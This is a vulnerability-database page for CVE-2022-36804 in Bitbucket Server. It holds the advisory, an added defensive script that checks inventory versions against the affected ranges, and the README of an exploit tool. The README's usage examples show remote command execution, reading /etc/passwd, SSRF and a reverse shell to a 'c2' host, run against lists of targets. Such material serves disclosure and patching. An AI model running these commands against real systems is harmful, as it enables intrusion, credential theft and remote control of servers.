CVE-2022-36804 PoC — Atlassian Bitbucket Server Security Vulnerability

Source
Associated Vulnerability
Title: Atlassian Bitbucket Server Security Vulnerability (CVE-2022-36804)
Description: Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.
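
The affected ranges in the description above are not simply "everything below 8.3.1": each release line has its own first fixed version. The following added example (not part of the PoC repository or of Atlassian's advisory) triages an inventory of Bitbucket versions against exactly those ranges. The hostnames and versions are constructed, and `not-listed` means only that a version falls outside the ranges quoted on this page.

```python
import re

# (first affected, first fixed) per the CVE description on this page; lower bound inclusive.
AFFECTED = [
    ((7, 0, 0), (7, 6, 17)),
    ((7, 7, 0), (7, 17, 10)),
    ((7, 18, 0), (7, 21, 4)),
    ((8, 0, 0), (8, 0, 3)),
    ((8, 1, 0), (8, 1, 3)),
    ((8, 2, 0), (8, 2, 2)),
    ((8, 3, 0), (8, 3, 1)),
]

def parse_version(text):
    """Turn 'X.Y.Z' into a comparable tuple; a missing patch level counts as 0."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)(?:\.(\d+))?\s*", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part or 0) for part in m.groups())

def classify(version_text):
    """Return ('affected', first_fixed_version) or ('not-listed', None)."""
    version = parse_version(version_text)
    for first, fixed in AFFECTED:
        if first <= version < fixed:
            return "affected", ".".join(str(n) for n in fixed)
    return "not-listed", None

def triage(inventory):
    """Classify (host, version) pairs; unparseable versions need manual review."""
    report = {}
    for host, version in inventory:
        try:
            report[host] = classify(version)
        except ValueError:
            report[host] = ("unknown", None)
    return report

# Constructed inventory; hostnames and versions are illustrative only.
SAMPLE_INVENTORY = [
    ("bb-prod.example.internal", "7.6.16"),
    ("bb-lts.example.internal", "7.6.19"),   # below 8.3.1 but past its line's fix
    ("bb-dev.example.internal", "8.3.0"),
    ("bb-old.example.internal", "unknown"),
]

if __name__ == "__main__":
    for host, (status, fixed) in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}" + (f" (upgrade to >= {fixed})" if fixed else ""))
```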
Description
Multithreaded exploit script for CVE-2022-36804 affecting BitBucket versions <8.3.1
Readme
# CVE-2022-36804-PoC
Multithreaded exploit script for CVE-2022-36804 affecting (most) BitBucket versions <8.3.1
See the full advisory here https://jira.atlassian.com/browse/BSERV-13438

All credit to [TheGrandPew](https://twitter.com/TheGrandPew) for discovery

The script automatically detects public repositories on Bitbucket instances, then selects a random repository to check or exploit. If there are no public repositories, a valid `BITBUCKETSESSIONID` cookie is required to exploit known vulnerable instances.

The PoC takes multiple input hosts and writes vulnerable hosts to stdout, so the results can be piped to other tools for processing.

Do not use for malicious purposes.

## Usage
```bash
usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
                         [--skip-check] [-t THREADS] [-v]
                         repos [repos ...]

CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  repos                 Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on

optional arguments:
  --auth-cookie AUTH_COOKIE
                        Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
  --proxy PROXY         HTTP Proxy: <http/https>://<ip>:<port>
  -e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
                        Exploit to perform
  --cmd CMD             Command to execute for the 'rce' exploit (curl http://example.com)
  --knary KNARY         Knary to respond too via DNS for the 'ssrf' exploit
  --server-file SERVER_FILE
                        Server file to download for the 'download' exploit (/etc/passwd)
  --host HOST           Hostname or IP address of c2 for the 'rev_shell' exploit
  --port PORT           Port of the c2 for the 'rev_shell' exploit
  --skip-check          Skip vulnerability checking stage
  -t THREADS, --threads THREADS
                        Worker Threads
  -v, --verbose         Increase output verbosity level
```
### Exploit modes

#### Check
> Single Host
>
> `CVE-2022-36804.py http://bitbucket.local:7990/`
>
> Multiple hosts, writing the vulnerable hosts and exploited repositories to a file
>
> `CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts`

#### RCE (Remote Code Execution)
> `CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/`

#### SSRF (Server-Side Request Forgery)
> Perform a DNS request to the specified knary
> 
> `CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/`

#### Download
> Download a repository with the target file `/etc/passwd`; this saves the compressed repository to a randomised file name.
>
> `CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/`

#### Rev_shell (Generates a reverse sh shell to the specified host and port)
> `CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/`
File Snapshot

[4.0K] /data/pocs/372c50272100a17156bea22b73d2c0c4a14a5c1c
├── [ 14K] CVE-2022-36804.py
├── [3.3K] README.md
└── [  44] requirements.txt

0 directories, 3 files